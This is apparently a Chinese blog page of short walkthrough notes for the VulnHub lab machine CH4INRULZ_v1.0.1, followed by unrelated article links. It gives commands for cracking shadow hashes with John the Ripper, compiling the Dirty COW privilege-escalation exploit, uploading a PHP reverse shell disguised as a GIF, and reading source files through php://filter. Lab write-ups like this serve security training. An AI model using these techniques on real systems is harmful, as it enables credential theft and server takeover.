二 CH4INRULZ_v1.0.1
二 CH4INRULZ_v1.0.1
1 john暴破密码
讲账号,更改为/etc/passwd的账号格式,。例如破解kali下的账号密码
第一步:unshadow /etc/passwd /etc/shadow > shadow_test
第二部:john shadow_test
便可以破解账号,如果破解过一次,可以使用john –show shadow_test 查看结果,或者查看~/.john/john.pot查看破解过的密码。
如果账号获取到的内容为“frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0”,模仿、/etc/passwd文件中的格式
Echo “frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0:1000:1000:frank,,,:/home/frank:/bin/bash” > test
John test
2kali自带webshell
/usr/share/webshells/
3脏牛提权
Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复
https://github.com/FireFart/dirtycow
编译执行
gcc -pthread dirty.c -o dirty -lcrypt
4gif上传法
Content-Disposition: form-data; name="fileToUpload"; filename="shell.gif"
Content-Type: image/gif
GIF98<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
上述红色位置,GIF98 加在文件头位置。
5 php://filter
file=php://filter/convert.base64-encode/resource=files_api.php
6 在kali上设置简单的HTTP服务器
python -m SimpleHttpServer 80
二 CH4INRULZ_v1.0.1相关推荐
- 【ICPC-283】hdu 2126 Buy the souvenirs(二维0/1背包)
点击打开链接hdu2126 思路: 二维0/1背包 分析: 1 题目给定n个物品的价钱和m的钱,问最多能买到的物品数有几种方案. 2 很明显就可以写出状态转移方程dp[i][j][k]表示的是前i个物 ...
- VulnHub靶场之CH4INRULZ_v1.0.1
下载地址:http%3A//download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova 主机发现 netdiscover -i eth0 -r 192.16 ...
- 估算带卷积核二分类0,3的网络的收敛时间和迭代次数
制作一个网络分类minst的0和3求出这网络的迭代次数曲线表达式n(δ),和准确率表达式p-max(δ),用预期准确率去估算n,并推算需要的时间. 将minst的28*28的图片缩小到9*9,网络用一 ...
- 十年IT运维谈(二)“0”和“100”
"很多时候,极限状态都是不可取的.一无所有的'0'和极尽完满的'100'都不见得是发展历程中最有利的状态." 经过这些年的沉淀,我们看到,这个市场在逐步地走向规范,用户的需求开始显 ...
- 超级账本Fabric学习(二)Fabric1.0.0网络搭建(中)无业务逻辑处理的Fabric网络
整合三个有依赖关系的yaml文件 1:docker-compose-cli.yaml文件源码解析 2:docker-compose-base.yaml文件源码分析 3:peer-base.yaml文件 ...
- 千分之二手续费0.2费率微信支付商户号申请
开通准备资料: 1.营业执照照片 2.法人身份证照片正面.背面 3.开户行信息,对公账号或个人银行卡(开户行.卡号.开户地.分支行) 4.客服电话.邮箱 5.微信公众号或微信小程序appid 开通流程 ...
- USB 之二 USB2.0 规范详解 第二部分
注意 对于物理特性仅做简单说明 主要是针对 USB 2.0 规范的第九章.第十章和第十一章.之前章节见后续见 第一部分 下面的举例报文为使用Bus Hound监听的U盘插入时的报文,报文见后文附件. ...
- 靶场渗透CH4INRULZ_v1.0.1
最新文章见我个人博客:点此 靶机环境下载地址:[下载] ova下载下来后直接导入virtualbox即可(https://www.vulnhub.com/entry/ch4inrulz-101,247 ...
- 生产环境mysql安装规划及调优实践(二)--mysql8.0.29为例
上一篇讲了如何安装mysql,这一篇讲一下主从复制的设置,以及生产常用的参数设置. 因为mysql的生产使用场景不同,所以不同的使用场景下,参数配置也要针对不同的业务来进行设置.比如是倾向于快速更新, ...
最新文章
- Iterator(迭代器)的一般用法
- KafkaOffsetMonitor 安装
- ELK 环境搭建1-Elasticsearch
- Eclipse插件CheckStyle的安装和使用
- C语言鸡尾酒排序cocktail sort算法(附完整源码)
- [Flashback]开启数据库闪回数据库功能
- CentOS安装scrot记
- Javascript图像处理——图像形态学
- 数组去重的JavaScript实现
- 论文阅读|How Does Batch Normalizetion Help Optimization
- lightning接口_苹果、安卓充电接口有望统一,欧盟重压下,苹果将不得不妥协
- 【软件开发】软件开发注意事项
- OpManager-企业网络问题分析及故障排除
- impala常用函数大全(超详细哦)
- 几种网赚项目引流的方法
- 计算机房面积设置气消条件,机房消防设计方案
- 什么是软件危机?它有哪些典型表现?为什么会出现软件危机?
- 网络请求及各类错误代码含义总结(包含AFN错误码大全)
- 鞋子微商怎么做qq引流?微商如何通过QQ空间引流
- 关于element upload上传时额外参数的问题